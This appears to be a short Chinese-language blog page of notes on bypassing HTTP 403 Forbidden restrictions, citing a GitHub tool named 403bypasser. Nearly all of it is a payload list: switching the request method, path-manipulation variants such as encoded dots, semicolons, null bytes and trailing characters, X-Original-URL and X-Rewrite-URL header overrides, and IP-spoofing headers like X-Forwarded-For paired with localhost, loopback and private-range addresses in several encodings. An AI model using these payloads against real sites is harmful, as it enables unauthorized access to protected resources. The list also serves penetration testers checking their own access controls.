403页面测试

浏览 82 扫码分享 2023-11-18 17:38:34

1. Request Method Manipulation
2. Path Manipulation
3. Overriding the Target URL via Non-Standard Headers
4. Other Headers & Values

https://github.com/yunemse48/403bypasser

1. Request Method Manipulation

Convert GET request to POST request

2. Path Manipulation
/%2e/secret
/secret/
/secret..;/
/secret/..;/
/secret%20
/secret%09
/secret%00
/secret.json
/secret.css
/secret.html
/secret?
/secret??
/secret???
/secret?testparam
/secret#
/secret#test
/secret/.
//secret//
/./secret/./

3. Overriding the Target URL via Non-Standard Headers
X-Original-URL: /secret
X-Rewrite-URL: /secret

4. Other Headers & Values
Headers:
X-Custom-IP-Authorization
X-Forwarded-For
X-Forward-For
X-Remote-IP
X-Originating-IP
X-Remote-Addr
X-Client-IP
X-Real-IP

Values:

localhost
localhost:80
localhost:443
127.0.0.1
127.0.0.1:80
127.0.0.1:443
2130706433
0x7F000001
0177.0000.0000.0001
0
127.1
10.0.0.0
10.0.0.1
172.16.0.0
172.16.0.1
192.168.1.0
192.168.1.1

若有收获，就点个赞吧

上一篇:

下一篇:

让时间为你证明

展开/收起文章目录